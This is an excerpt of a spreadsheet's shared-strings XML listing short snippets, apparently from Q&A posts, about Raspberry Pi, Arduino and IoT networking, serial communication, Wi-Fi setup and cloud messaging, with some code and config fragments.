    <t>Once you've connected, you could set a password (which you probably ought to do for the two user accounts with username root and host '%' and 'localhost' (there may also be one for an IPv6 address).</t>
  </si>
  <si>
    <t>ControlChannelTrigger enables real time notifications to be received in the background for objects that establish a TCP connection.</t>
  </si>
  <si>
    <t>Email verification is the process determining whether a particular email-address can actually receive mail and (usually) that a particular person has access to it (e.g.</t>
  </si>
  <si>
    <t>It is able to craft or decode packets of most common network protocols, send them on the wire, capture them and match requests and replies.</t>
  </si>
  <si>
    <t>I think about two alternatives, make a for-loop to send unicast packet to every module (up to 20), after that, verifying my buffer receptor if I get any response.</t>
  </si>
  <si>
    <t>I'm using an external USB to RS-232 adapter since the internal serial port is reserved for Kernel Debugging.</t>
  </si>
  <si>
    <t>It Gets Detected in Windows 10 PC &amp; I can connect to it by using USB to Serial Converter through my Laptop's USB Port &amp; I Can send &amp; Receive Data using .Net applications.</t>
  </si>
  <si>
    <t>This all works very well but The problem here is that the confirmation "ok" after the address comes directly after the address which then lands up in my string instead of the address, not always but most of the time so it's a hit and miss every now and then.</t>
  </si>
  <si>
    <t>The brute-force approach is:  enumerate the USB serial devices, open() each in turn, and see if your firmware boot header is sent on the other end.</t>
  </si>
  <si>
    <t>Additionally, I changed the way the relay/wire spoof was connected to the GPIO of the Raspberry Pi, changing to 3.3V outputs to GPIO.</t>
  </si>
  <si>
    <t>Traversal Using Relays around NAT is an internet protocol that allows clients to receive connections even if their addresses are translated by middleware.</t>
  </si>
  <si>
    <t>I found this example how to encrypt and decrypt string in PHP
Also I found AES library for Arduino but it has different format for key and iv (hex)
How to write key and iv from Arduino code in PHP properly?</t>
  </si>
  <si>
    <t>The next step then is to try:
sudo python -m serial.tools.miniterm /dev/rfcomm1 38400
In principle access right problems lead to situations where we can receive but not send.</t>
  </si>
  <si>
    <t>You can run the following command to identify your raspberry pi's IP address (assuming your router assigns IP addresses in 192.168.1.x space):
nmap -sn 192.168.1.1/24
The Raspberry Pi will show up with its ethernet MAC address and most likely also that the address belongs to RPI foundation.</t>
  </si>
  <si>
    <t>Door Alarm: If door is left open for a certain duration, an led will blink, then an alarm will ring
2.)</t>
  </si>
  <si>
    <t>Scanning Addresses in I2C
I've been trying to scan addresses 1-128 on the ports of Raspberry Pi 3 that exist when using I2C.</t>
  </si>
  <si>
    <t>try Serial.readString()
https://www.arduino.cc/en/Serial/ReadString
here is my sample code for checking a password from RX pin
I hope it helps you.</t>
  </si>
  <si>
    <t>Checking in advance for the ultrasonic sensor there's not much anyone can suggest without knowing more about the sensor.</t>
  </si>
  <si>
    <t>First you have to configurate sspmode 0, for pin request:
hciconfig hci0 sspmode 0
And using bt-agent aplicattion (you can run as deamon too):
Edit the file configuration, you can put tha mac address and the pin:
For example:
Or if you want a pin to all the device the same pin code, for example 1234, edit the file like this:
* 1234
This work for me!</t>
  </si>
  <si>
    <t>But unfortunately the response string gets corrupted in some strange way:
Assuming that I enter an 'unknown command', the first 11 bytes are printed correctly via the serial interface (the rest is dump) and the first 11 bytes received by the client are dump, but the rest is correct (see comments in script below).</t>
  </si>
  <si>
    <t>Here is the HCI Dump:
Now when I try a connection via  or gatttool the connection is made - yet trying to write characteristic values fails with Characteristic Write Request failed: Attribute requires authentication before read/write.</t>
  </si>
  <si>
    <t>I've been trying to use the javacscript version of the Eclipse Paho MQTT client to access the Google IOTCore MQTT Bridge, as suggested here:
https://cloud.google.com/iot/docs/how-tos/mqtt-bridge
However, whatever I do, any attempt to connect with known good credentials (working with other clients) results in this connection error:
Not much to go on there, so I'm wondering if anyone has ever been successful connecting to the MQTT Bridge via Javascript with Eclipse Paho, the client implementation suggested by Google in their documentation.</t>
  </si>
  <si>
    <t>to permanently disable serial service, use 
    sudo systemctl mask serial-getty@ttyAMA0.service
in this case serial service will not start even on reboot.</t>
  </si>
  <si>
    <t>ports 1883 (unsecured connections), 8883 and 443 (secured connections) are use with IBM WIoTP and needs to be opened on firewall</t>
  </si>
  <si>
    <t>Necessarily so, serial ports sit at the very bottom layer of the OSI model, there is no protocol that arbitrates access to the port.</t>
  </si>
  <si>
    <t>Mutual authentication protocols provide for verification of the identities asserted by both sides of a network connection, causing the connection to fail if either side fails the authentication test.</t>
  </si>
  <si>
    <t>A simple double check is to confirm that the address pins have been wired to configure the address you have coded.</t>
  </si>
  <si>
    <t>MySQLi Object-Oriented
MySQLi Procedural
PDO
&lt;?php
$servername = "localhost";
$username = "username";
$password = "password";
try {
    $conn = new PDO("mysql:host=$servername;dbname=myDB", $username, $password);
    // set the PDO error mode to exception
    $conn-&gt;setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    echo "Connected successfully"; 
    }
catch(PDOException $e)
    {
    echo "Connection failed: " .</t>
  </si>
  <si>
    <t>Probing the real system is much more difficult as it usually locks or at least forces delay after multiple failed attempts.</t>
  </si>
  <si>
    <t>However, the ifconfig does show me the interface eth0, but does not include any ip address or broadcast address.</t>
  </si>
  <si>
    <t>A manual process which only seems to work for one Arduino at a time
Successfully run the program in Windows without fault
Verified the Arduinos are recognized by the Pi running "dmesg | grep tty"
Here is what I hope to solve:
Automatic setup/initialization of the Arduino serial ports.</t>
  </si>
  <si>
    <t>I have an arduino Uno which collect data from sensor, i want to send this data to the cloud using wifi esp8266 who support SSL using the library WifiClientSecure, is there an alternative to send data from arduino to the esp card and esp8266 read this data and send it after that to the cloud, i'm able to work with mqtt but i want to know if there is a way to have a directly connection between the arduino uno and esp8266 without having a third part, any help will be gratefull.</t>
  </si>
  <si>
    <t>If you havent already, make your socket a nonblocking socket, it sends out a flag when something goes wrong instead of crashing the program
Make sure you close the connection properly (it seems that you are doing that though)
Make sure that the GPS has no factory settings that prevent you from connecting instantly again.</t>
  </si>
  <si>
    <t>You can find "port" number after starting Visual Studio Remote Debugger like this:
You will be request to enter remote debugging PIN after deploying.</t>
  </si>
  <si>
    <t>When trying to connect to a Sphero (from Orbotix) through Bluetooth, on a Raspbian Jessie fully updated:
if I do (being root, with Sphero paired and trusted)
As you can see the connection fails
but if I do instead 
# rfcomm connect /dev/rfcomm0 {sphero-mac-address}
Connected /dev/rfcomm0 to {sphero-mac-address} on channel 1
The connection succeeds, and the Sphero appears connected in bluetoothctl also, afterwards.</t>
  </si>
  <si>
    <t>Leave serial port login enabled when the Pi boots, but have your script turn it off as it starts and maybe turn it back on when it's done.</t>
  </si>
  <si>
    <t>It can also be authenticated with the IoT Core Admin SDK (via service accounts) to then send a configuration/command back down to the device you want to light up with the LED.</t>
  </si>
  <si>
    <t>Although this is a conveniece for Windows machines, an application still should determine its own criteria for handling a failed connect attempt IMO (i. e number of attempts, timeouts etc).</t>
  </si>
  <si>
    <t>I have toggle switches connected to switch a few lights in the house for hardware activation plus I have it setup to be activated through Home Assistant with MQTT topics.</t>
  </si>
  <si>
    <t>You can now safely experiment to find ways to prevent serial port usage from locking up the device in the future.</t>
  </si>
  <si>
    <t>0x01 0x20 0xff
I check that the data has not been malformed in any way before I call
The data is always ok.
Arduino Serial Read
For debugging purposes I do the following - for every byte that the Arduino board receives, it will return 32 bytes of data with the incoming byte as the first byte, followed by 30 0x00's then a terminator byte.</t>
  </si>
  <si>
    <t>For Port Forwarding open your router:
login &gt;&gt; manual setup &gt;&gt; Advanced Tab &gt;&gt; portforwarding rules &gt;&gt; give your local ip address of the webserver pointing to &gt;&gt; for hhtp(web) open port 80 &gt;&gt; save the settings.</t>
  </si>
  <si>
    <t>FDP packets contain information such as hostname/device ID, software version, product platform and capability, vlan and layer 3 protocol address of the port sending the update.</t>
  </si>
  <si>
    <t>What I'd like is for the entire buffer captured from my recording callback to be encoded, decoded, and sent back to the playback loop.</t>
  </si>
  <si>
    <t>Register a device into IoT hub using below code - 
it is successfully registering devices into Iot hub now I want to send data to these devices using code c# 
I have code to send data to device below but i don't know how to get connection string of particular device or key to send data.</t>
  </si>
  <si>
    <t>token
 struct Glove glove = { .index.pin = 20, .middle.pin = 22, .ring.pin = 24, .thumb.pin = 26};
                        ^
Sensor_Glove:40:41: error: expected primary-expression before '.'</t>
  </si>
  <si>
    <t>To get connected to any bluetooth profile running on a remote device, you need to establish socket connection with the UUID [of the service you want to connect.].</t>
  </si>
  <si>
    <t>see the tutorial below:
https://www.howtoforge.com/tutorial/configure-postfix-to-use-gmail-as-a-mail-relay/
http://www.algissalys.com/network-security/send-email-from-raspberry-pi-command-line</t>
  </si>
  <si>
    <t>Here's my final code:
CODE:
Serial monitor:
The weird thing is that my fingerprint doesn't match but that it still proceeds to give me information.</t>
  </si>
  <si>
    <t>SSID is considered to be a fairly weak form of security because an SSID can be sniffed in plain text from a packet and most access points broadcast the SSID.</t>
  </si>
  <si>
    <t>Blocks of data entering these systems get a short check value attached, based on the remainder of a polynomial division of their contents; on retrieval the calculation is repeated, and corrective action can be taken against presumed data corruption if the check values do not match.</t>
  </si>
  <si>
    <t>AFAIK there is no way I can force the kernel to trap word-sized unaligned accesses, since to do that apparently the CPU should be configured in order to trap the unaligned addresses in every case, but the Linux kernel does not do that AFAIK, probably because there is alignment unsafe code inside the kernel itself.</t>
  </si>
  <si>
    <t xml:space="preserve">
index.js
How to get device id and device key:
Login azure
All resources and find your iot hub
Device Explorer
Click the device which you want to connect or create one
Send a test message:
Click "Send Message"
Type something and send
You will see "receive!</t>
  </si>
  <si>
    <t>One button causes a thread to be woken up which prints text to the console, and goes back to sleep, while another button stops this operation early by locking a mutex, changing a status variable, then unlocking the mutex again.</t>
  </si>
  <si>
    <t>Because you start the server process with your  file, an attempt will be made to start it when your system boots, when you start a new shell, or when you ssh into the system.</t>
  </si>
  <si>
    <t>I'm working on Raspberry Pi with Java ME 8.0 and I want to use GPIO pin 7
also tried with below code:
I have give all API permissions, But When I run  midlet I see error:
[ERROR] [DAAPI] iso=-1:There is unexpected error, when open GPIO pin 7
Currently I have not connected anything to GPIO 7 pin, is this is the problem?</t>
  </si>
  <si>
    <t>I also want the user to log-in in a website hosted on this remote server, where s/he can monitor any sensor values or send commands (e.g.</t>
  </si>
  <si>
    <t>I have a ZK Teco Fingerprint Device and Printing Device and I am building a solution to Print Token when fingerprint matched.</t>
  </si>
  <si>
    <t>Step 2: The device (Device10) received a direct method
Step 3: The device (Device10) sent the response back to the invoker
Step 4: The invoker received a response from the Device10 within the timeout limit</t>
  </si>
  <si>
    <t>Also, I can't imagine how BACNET devices can send alarms to my server.</t>
  </si>
  <si>
    <t>This is the error I keep getting:
GPIO.setup(17,GPIO.OUT)
ValueError: The channel sent is invalid on a Raspberry Pi</t>
  </si>
  <si>
    <t>It also asks for password but after that there is no output of successful connection.</t>
  </si>
  <si>
    <t>I have an Intel Galileo board with LED connected to one of GPIO pin.</t>
  </si>
  <si>
    <t>prints: secretwifi (SSID of wifi).</t>
  </si>
  <si>
    <t>The connection is established using WebSocket and wifi.</t>
  </si>
  <si>
    <t>Of course, you need to provide your SSID and SSID password and specify the host name.</t>
  </si>
  <si>
    <t>Red wire:vcc
Black wire:GND
Green wire: Arduino Uno pin 2
White wire: Arduino Uno pin 3
But i am getting error: Did not find fingerprint sensor.</t>
  </si>
  <si>
    <t>If this does not work then make sure that the RN-42 is not in SPP mode by pulling up GPIO11 or send commands to RN-42 and turn on HID mode.</t>
  </si>
  <si>
    <t>2. try ssh 192.168.1.20 from the rpi itself
 3. try connecting the RPI via the ethernet cable (not wifi)
 4. try changing the IP of RPI - sometimes it helps
 5. sometimes the power managment turns the wifi off - try running  periodically</t>
  </si>
  <si>
    <t>A simple connected/disconnected status would have no meaning to an access point which can have multiple concurrently connected clients.</t>
  </si>
  <si>
    <t>The key points there are:
flash the SD-card using utility
setup wifi using utility
The utility could be found here
After that you are going to be able to connect over wifi</t>
  </si>
  <si>
    <t>I am trying to create a program that will, on the raspberry pi, analyze all IP packets leaving a "Private" Network and if the packet destination is one that needs its packets encrypted, it should basically for lack of better term, intercept and encrypt that packet and then send it.</t>
  </si>
  <si>
    <t>Can BACNET devices send the equivalent of SNMP Traps to my server IP address?</t>
  </si>
  <si>
    <t>This leads me to believe the interrupts are being masked somewhere (I've checked PRIMASK, global enable and individual enable so far with no luck).</t>
  </si>
  <si>
    <t>My nginx configuration:
Local access is possible but when I try to access remotely, I get redirected to the IP 192.168.188.32 and I get a timeout ("Safari could not open the page because the server stopped responding").</t>
  </si>
  <si>
    <t>The connection is said to be mutually authenticated when a) the identities of both sides are validated; b) the connection fails if either validation fails.</t>
  </si>
  <si>
    <t>After ESP_GATTS_CONNECT_EVT I call esp_ble_set_encryption(connection.remote_bda, ESP_BLE_SEC_ENCRYPT_MITM), and to be "bullet proof" I have a task which checks if the pairing successed, and if not then it try 10 times (with delay between them) to use esp_ble_set_encryption(connection.remote_bda, ESP_BLE_SEC_ENCRYPT_MITM) for start pairing, but I always get the following error message:
"BT: earlier enc was not done for same device".</t>
  </si>
  <si>
    <t>Press Ctrl-C to exit
[CRITICAL] [SECURITY] iso=2:Permission check failed: javax.microedition.io.SocketProtocolPermission "socket://10.91.40.145:9002" ""
TRACE: &lt;at java.security.AccessControlException: &gt;, startApp threw an Exception
java.security.AccessControlException: 
 - com/oracle/meep/security/AccessControllerInternal.checkPermission(), bci=128
 - java/security/AccessController.checkPermission(), bci=1
 - com/sun/midp/io/j2me/socket/Protocol.open(), bci=127
 - com/sun/midp/io/j2me/socket/Protocol.openPrim(), bci=4
 - javax/microedition/io/Connector.open(), bci=77
 - javax/microedition/io/Connector.open(), bci=6
 - javax/microedition/io/Connector.open(), bci=3
 - smartgridapidemopi/SmartGridAPIdemoPI.startApp(SmartGridAPIdemoPI.java:48)
 - javax/microedition/midlet/MIDletTunnelImpl.callStartApp(), bci=1
 - com/sun/midp/midlet/MIDletPeer.startApp(), bci=5
 - com/sun/midp/midlet/MIDletStateHandler.startSuite(), bci=264
 - com/sun/midp/main/AbstractMIDletSuiteLoader.startSuite(), bci=38
 - com/sun/midp/main/CldcMIDletSuiteLoader.startSuite(), bci=5
 - com/sun/midp/main/AbstractMIDletSuiteLoader.runMIDletSuite(), bci=132
 - com/sun/midp/main/AppIsolateMIDletSuiteLoader.main(), bci=26
java.security.AccessControlException: 
 - com/oracle/meep/security/AccessControllerInternal.checkPermission(), bci=[ERROR] [AMS] iso=1:Sending the notification: com.oracle.midp.proxy.RunCommand@d17b7662.</t>
  </si>
  <si>
    <t>In the arduino file under the void setup() make sure to include 
Otherwise the connection won't be established.</t>
  </si>
  <si>
    <t>Nothing seems to happen when I run it:
From the serial console:
From my computer:
$ fastboot flashing unlock
&lt; waiting for any device &gt;
$ fastboot oem unlock
&lt; waiting for any device &gt;
Both 'fastboot devices' and 'adb devices' fail to return anything.</t>
  </si>
  <si>
    <t>token
 struct Glove glove = { .index.pin = 20, .middle.pin = 22, .ring.pin = 24, .thumb.pin = 26};
                                         ^
Sensor_Glove:40:59: error: expected primary-expression before '.'</t>
  </si>
  <si>
    <t>A  file in the Git root lists alternative names and email addresses belonging to a primary username/email address pait.</t>
  </si>
  <si>
    <t>It relies on two facts: that peripheral
     functions (such as PWM) take precedence on output pins, so our PORT-
     wide writes won't interfere, and that interrupts are globally disabled
     while data is being issued to the LEDs, so no other code will be
     accessing the PORT.</t>
  </si>
  <si>
    <t>Room owner of a moderation focused chat room
Active on meta
Active on SO from 7am to at least 4pm US Central Time (12pm to 9pm UTC)
Helped moderators hunt for plagiarism
13.8K close votes with 3.5K close vote reviews.</t>
  </si>
  <si>
    <t>Apparently once you do that, it doesn't matter what you tell the serial driver to do, the pin will stay low.</t>
  </si>
  <si>
    <t>Once one process opens a port, another will get error 5 (access denied) when it tries to open the same port.</t>
  </si>
  <si>
    <t>I'm attempting to write a C# library which looks at all available USB serial ports on a Raspberry Pi so that I can enumerate, identify and communicate with a set of Arduinos connected to the Pi via a USB hub.</t>
  </si>
  <si>
    <t>Updated Code based on answers 
&lt;?php
    $dbusername = "arduino";  
    $dbpassword = "test";  
    $server = "localhost"; 
    $dbconnect = new PDO('mysql:host=localhost;dbname=test;charset=utf8mb4', 'arduino', 'test');
    $stmt = $dbconnect-&gt;prepare('insert into sensor(value) values(:val)');
    $stmt-&gt;bindParam(':val', $_GET["value"], PDO::PARAM_INT);
    $stmt-&gt;execute();
    print "procedure returned $return_value\n"; 
?&gt;</t>
  </si>
  <si>
    <t>[no-public-ip/incoming ports blocked]
 Connecting the Device to internet via UMTS stick and having no public ip and having all usable ports blocked by APN, no SSH connection will work..
3.</t>
  </si>
  <si>
    <t>BTW, if you are sending information (not just receiving), all software serial port libraries disable interrupts during transmission, except AltSoftSerial... which you can't use.</t>
  </si>
  <si>
    <t>More tips:
Make sure your serial sender is sending what you think by using a terminal emulator or a trusted device to verify that you're sending what you think you're sending.</t>
  </si>
  <si>
    <t>Other hosts can then resolve the peer name, retrieve the corresponding addresses and other information, and establish peer-to-peer connections.</t>
  </si>
  <si>
    <t>Data quality is a big issue surrounding street addresses, because they are not simple strings or numbers such as an email address or phone number.</t>
  </si>
  <si>
    <t>I run the CC3200 project in Energia, but on Serial Monitor Terminal I received a weird coded message: 
zrZzXBH(XX{FRBX@XJJ,
and I have no idea what's going on.</t>
  </si>
  <si>
    <t>but it returns Failed to configure Ethernet using DHCP on the serial monitor.</t>
  </si>
  <si>
    <t>My homebrew Wi-Fi temperature sensor works when connected to one of my access points, but with another one I get "Safari can't open the page because the server unexpectedly dropped the connection."</t>
  </si>
  <si>
    <t>Code:
However, I have more things on the breadboard now - the LCD, micro SD reader, potentiometer and an LM35 temperature sensor
and this my code:
I'm getting the results in the serial monitor but the LCD displays random characters which resemble encrypted text.</t>
  </si>
  <si>
    <t>Addressed issue where MidlRT and MDMerge failed to run on Windows 7
Addressed issue where SDK setup failed to install on Windows
Addressed issue where deploying a legacy Store app to a 8.1 Phone caused Visual Studio to crash
Addressed issue where application data was not preserved across remote debugging sessions when apps were getting un-registered 
For more info, please see Windows SDK and emulator archive.</t>
  </si>
  <si>
    <t>Since that link might go away some day, or might get behind an authentication scheme, the key steps are:
Change the COM port number of the FTDI USB-serial port, assigned by default.</t>
  </si>
  <si>
    <t>I want to use the fingerprint data and find a way to put it in my own database but i am having trouble on getting the template data of the finger print.</t>
  </si>
  <si>
    <t>I have a python script that is run over SSH on a Raspberry Pi
It opens up multiple serial ports on the Pi, sends a command to the devices, then returns the results.</t>
  </si>
  <si>
    <t>If the key is held, the servo would continue moving
Once the key is released, the servo would stop moving.</t>
  </si>
  <si>
    <t>I expected that the connection will work exactly like with the AWS certificates, but the code return me this error: "failed, reason -&gt; Connection Accepted &lt; try again in 5 seconds" and I don't what kind of error it can be!</t>
  </si>
  <si>
    <t>It's not connected to the internet (direct wifi/ethernet or shared connection)
It's DNS servers are not configured so it doesn't know who to contact to resolve the domain name into an IP address
If you're sure your RPi is connected to the internet, I would test theory 2 by pinging google.com and then pinging 8.8.8.8 (public DNS server) from your RPi.</t>
  </si>
  <si>
    <t>For example pins related to memory controller have a very strict performance requirements set (in terms of signal integrity, toggle rate, output driver, capacitance), those pins are fixed function not reassignable, thus you can not use those pins for GPIO.</t>
  </si>
  <si>
    <t>This is the program I have written in C++ on my BeagleBone:
My code on the Arduino Uno is as follows:
C++ - I am first opening up my UART port on the BeagleBone and sending the string "650X450Y" character by character which is repeated 500 times to see if my communication system is robust or not.</t>
  </si>
  <si>
    <t>I tried to use the custom nodemcu firmware builder with the latest flasher tool, repeating the same flashing process as for the step above, the flash is successful but ESPlorer cannot establish the connection - acts like the baud rate is not correct.</t>
  </si>
  <si>
    <t>This is the code I've tried:
The code otherwise works fine, if the finger is placed and validated, it turns off and goes back to waiting for another validate command.</t>
  </si>
  <si>
    <t>Now I want to send firmware to Device (in my case it's not direct edge device, application will receive the command/firmware and then send it to the instrument/device).</t>
  </si>
  <si>
    <t>It might also be running a terminal, so you'll have to open up /etc/inittab and comment out this line and reboot:
If you don't, your arduino is going to be trying to log in to your pi whenever it sends anything to the serial port.</t>
  </si>
  <si>
    <t>If the secret does not match, then Arduino returns a HTTP answer 404 (Not Found) or Not authorized, or something similar.</t>
  </si>
  <si>
    <t>If that maximum time is reached, the Connection Status is invoked with status UNAUTHENTICATED and reason RETRY_EXPIRED.</t>
  </si>
  <si>
    <t>And when you send request, this will look something like this:
UPDATE: As far as you send request, the server on that side checks if your token matches the one he has.</t>
  </si>
  <si>
    <t xml:space="preserve">
In theory, an attacker could find a pair private / public key values, different than the geniune, that would match with the genuine fingerprint stored on the IoT Hub / DPS.</t>
  </si>
  <si>
    <t>I kept getting 
"Network Connect: Connection Refused"
when attempting to SSH in with putty.</t>
  </si>
  <si>
    <t>I dont need any other thing to run, but just want GPIO access (and LED blink)</t>
  </si>
  <si>
    <t>However, when I use netcats and try to get the Arduino to connect to my local PC, netcats keeps telling me the connection is invalid since the Arduino has no known MAC address.</t>
  </si>
  <si>
    <t>I'm using the raspberry pi and smtplib along with googles smtp servers (port 587) to send out automated emails.</t>
  </si>
  <si>
    <t>the code can make the device connected with WIFI, but cannot send the data to Ubidots.</t>
  </si>
  <si>
    <t>I tried to login through putty but got some network unreachable error, while login with putty, I given my raspberrypi ip address as host on ssh port 22. through nmap command i got to know that all 1000 ports for this device "raspbeerypi" is closed.</t>
  </si>
  <si>
    <t>Slave code: Using Serial.available, waits for 2 packets.</t>
  </si>
  <si>
    <t>i want change ip address, subnet mask and gateway of Pi3 in node js.</t>
  </si>
  <si>
    <t>If my first advice wont work, try to disable debounce for that pin.</t>
  </si>
  <si>
    <t>First of all, it requires the use the SafeSerialPort, which allows you to dispose the serial port properly.</t>
  </si>
  <si>
    <t>It is required now because when your ssh connection breaks, the flask server will shutdown if it is not running in the background.</t>
  </si>
  <si>
    <t>Then you would have something similar to how the 3 way handshake used to establish TCP connections.</t>
  </si>
  <si>
    <t>Side note:
When you ssh to your pi from your computer, your pi will use port 22, but your computer could be using any port between 49152 - 65535, it doesn't use port 22.</t>
  </si>
  <si>
    <t>Unplug any connection to arduino pins before upload.</t>
  </si>
  <si>
    <t>Also, though I don't think you would have been able to turn on your LED without it, imho Python needs to be run as root to access the GPIOs.</t>
  </si>
  <si>
    <t>You also need to setup your eth0 or wifi1 (if you have a second wireless device) to an address on another subnet.</t>
  </si>
  <si>
    <t>It is not a WiFi shield for Arduino; although you can connect it to an Arduino via serial pins and use its WiFi capabilities.</t>
  </si>
  <si>
    <t>Then send your USER, wait for the 331, then send your PASS.</t>
  </si>
  <si>
    <t>Call  before attempting to connect (before the WiFi.begin(ssid, password);).</t>
  </si>
  <si>
    <t>token
 struct Glove glove = { .index.pin = 20, .middle.pin = 22, .ring.pin = 24, .thumb.pin = 26};
                                                           ^
Sensor_Glove:40:75: error: expected primary-expression before '.'</t>
  </si>
  <si>
    <t>/etc/network/interfaces
My own wifi has the following configuration:
hidden SSID
TKIP+AES (WPA/WPA2) with PSK authentication
So I generated a PSK version of my wifi password:
And configured these two files:
/etc/network/interfaces
auto lo
iface lo inet loopback
iface eth0 inet dhcp
auto wlan0
allow-hotplug wlan0
iface wlan0 inet dhcp
wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
iface default inet dhcp
and /etc/wpa_supplicant/wpa_supplicant.conf
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
network={
   ssid="&lt;SSID"
   psk=&lt;PSK&gt;
   proto=WPA2
   key_mgmt=WPA_PSK
   pairwise=CCMP
   group=CCMP
   auth_alg=OPEN
}
The USB Adapter and its module are working fine (lsusb, lsmod).</t>
  </si>
  <si>
    <t>UWP on Win10 PC
(its the last item - FTDIBUS... via COM3)
But on the RPi, the device (via FTDI BUS) is not detected...
UWP on Pi/Win10IOT
There is suggestion here of some level of support for FTDI from Windows IOT blog:
We have also included an in-box driver for the FTDI USB-to-serial
  chipset because many devices use that as the interface port for
  controlling them (for example, Home Automation Systems).</t>
  </si>
  <si>
    <t>I found a good fake server that I usually start with the following command:
I can easily send e-mail with a python client or telnet commands from the localhost and foreign computer (Linux, Windows).</t>
  </si>
  <si>
    <t>When running in browser, it only shows:
    Error 0:
the result when running in console:
PHP Warning:  pg_connect(): Unable to connect to PostgreSQL server: FATAL:  password authentication failed for user "raspiserver"
FATAL:  password authentication failed for user "raspiserver" in php shell code on line 1
I also have tried to change host=localhost to host=127.0.0.1 or host=0.0.0.0.</t>
  </si>
  <si>
    <t>OR
Nothing gets logged in the client.err or the client.out files and the bluetooth icon in the top of the screen shows that it is connected but I only receive a value of 0 for the temperature it should be sending.</t>
  </si>
  <si>
    <t>I am trying to receive some values through POST and the values is something like that:
The actual result of the above code is ( am sending through a web browser the ssid=htc and password=fr):
Password: fr
SSID: htc&amp;pwd=fr
I would like to have in a string the password only and in another string the ssid.</t>
  </si>
  <si>
    <t>Performing error checks, it claims the peer was added successfully but when I try and send a response back to the slave to acknowledge it I get a sending error.</t>
  </si>
  <si>
    <t>It is able to:
forge or decode packets of a wide number of protocols
send them on the wire, capture them, match requests and replies, and much more.</t>
  </si>
  <si>
    <t>So there must be some sort of Handshake between the remote and the host so that the connection is retained.</t>
  </si>
  <si>
    <t>I want to send data from raspberry pi3 to server cloud use python
I decided use 'mysql.connector' lib
but my friend say that : the lib support for send data to cloud (ex: mysql.connector, MysqlDb,....)  very easy hack user and password of database because when use this lib, you may open port, this is chance for hackers
If you dont want hacker attack, you may use 'http'(urllib3) to send data to server cloud
My friend is right or wrong??</t>
  </si>
  <si>
    <t>However when I try to run the console apps, the Receive client throws an error at the following:
The full error message is as follows:
My research so far suggests this is some sort of server setup problem, and usually caused by either needing to open ports, change firewall settings, however
A) I cant find anywhere in the Azure dashboard to do this
B) I would have thought it will be configured correctly for this by default
Is there something obvious that i'm missing, or do I need to go and start chasing my IT department to see if they are blocking it?</t>
  </si>
  <si>
    <t>I'm trying to securely connect ESP8266 to MQTT Azure Protocol Gateway broker on cloud or local computer (tried both) like this (not important - connection works correctly):
ESP connects to server and handshake is completed successfully.</t>
  </si>
  <si>
    <t>In device logs I see successful connection attempts, authentication is OK, but any topics posted are rejected:
When I look at my device dashboard, I see that both the Sensor Data and Recent Events sections are empty.</t>
  </si>
  <si>
    <t>Hey all I am trying to figure out why my HAC-SHA-256 encryption and decryption is not matching up from my Arduino code to my .net code:
C# code:
Arduino code:
The output from the .net program is this:
HMAC: 2d484b68dae3866fbcbf182071c3bf5e86f40ab6c2f3bc72d69fe0d132bf771e
SHA : 5929bc8b6968e763c7f23090f7d6194c4f1377bd8f6e4b781a5ecdb8e8f91f8f
And the Arduino output:
Result:9a9f6119b41604441db0a75bad6c4e1653a4d00781d4b177e99fe850ad543051
I'm not sure what innerKey and outterKey is in the .net program.</t>
  </si>
  <si>
    <t>You enter the IP address and port number in your private network and you easily establish a connection between the Raspberry and the phone App you are making.</t>
  </si>
  <si>
    <t>This will work even without  as it serves on non-privileged port 8000
If you want to serve on port 80, you have to use sudo and you shall pass port number on command line:
$ sudo python -m SimpleHTTPServer 80
There is no need to forward this port, it is served already.</t>
  </si>
  <si>
    <t>The DHCP Server shall at a minimum support Internet Protocol version 4 (IPv4) and assignment of an IP address, subnet mask...
...A P2P Client that uses IP shall be capable of acting as a DHCP Client.</t>
  </si>
  <si>
    <t>Traps are sent without expecting acknowledgement, in contrast to Inform messages.</t>
  </si>
  <si>
    <t>For the background application I've checked the capabilities:
internetClient
internetClientServer
privateNetworkClientServer
I'm runnig the Kestrel server with the following code:
And opend the ports using the following powershell command: netsh advfirewall firewall add rule name="FezHat.Web.Api" dir=in action=allow protocol=TCP localport=5001
But the following exception is thrown:
System.IO.IOException: 'Failed to bind to address http://[::]:5001: address already in use.'</t>
  </si>
  <si>
    <t>Here a partial code of the node:
As mentioned, I can send and receive messages (I don't know if they are encrypted or on fallback unencrypted) but the step
always fails.The fingerprint was exported with OpenSSL as a SHA1 key.</t>
  </si>
  <si>
    <t>It continues to broadcast until someone answers
If you are seeking to be even more robust, this handshake could be expanded one step.</t>
  </si>
  <si>
    <t>I need to connect my raspberry pi to my school wireless network and ssh/vnc into it, but I don't want to have to bring peripherals ( mouse, keyboard, monitor ) just to check which IP address it's been dynamically allocated.</t>
  </si>
  <si>
    <t>I'm trying to get HTTPS to work with my endpoint; it works great with the esp8266/Arduino stack but the HW WDT triggers with the esp-open-sdk stack and so the HTTPS connection fails.</t>
  </si>
  <si>
    <t>Check install:
-- sudo mysql --user=root
Add the wifi credentials:
Create file on the card called wpa_supplicant.conf, which has the following inside:
Edit country=, ssid= and psk= with your information and save the file.</t>
  </si>
  <si>
    <t>i have developed my own chaincode that can be used to turn on and off a LED connected to the rpi from the blockchain.</t>
  </si>
  <si>
    <t>I have checked "Handshake.js" and there is everything alright, so I dumped stdin and stdout messages:
    {stdin}AUTH EXTERNAL 30
    {stdout}OK df028c4a159a4db39ccc41c0542b9e3b
    {stdin}BEGIN
    {stdin}lmo/org/freedesktop/DBussorg.freedesktop.DBussHellosorg.freedesktop.DBus
    PuTTY{stdin}l5o/org/mpris/MediaPlayer2sorg.freedesktop.DBus.PropertiessGets org.mpris.MediaPlayer2.omxplayegss org.mpris.MediaPlayer2.omxplayePosition
{stdout} - stdout message line
{stdin} - stdin message line
and then "EPIPE".</t>
  </si>
  <si>
    <t>In theory, an attacker could find a pair private / public key values, different than the geniune, that would match with the genuine fingerprint stored on the IoT Hub / DPS.</t>
  </si>
  <si>
    <t>you have to replace the status file 
if that doesn't help, because status-old is corrupted as well get the initial status file from backups
then run apt-get update</t>
  </si>
  <si>
    <t>I also tried using 239.255.255.250 as the multicast address (see Edit 1, above), which gave the error route: netmask doesn't match route address.</t>
  </si>
  <si>
    <t>The Arduino code is:
while the code of android is:
}
THE PROBLEM IS: when i try to input the password android return toast "Nothing received, timeout" while arduino stop the void loop().</t>
  </si>
  <si>
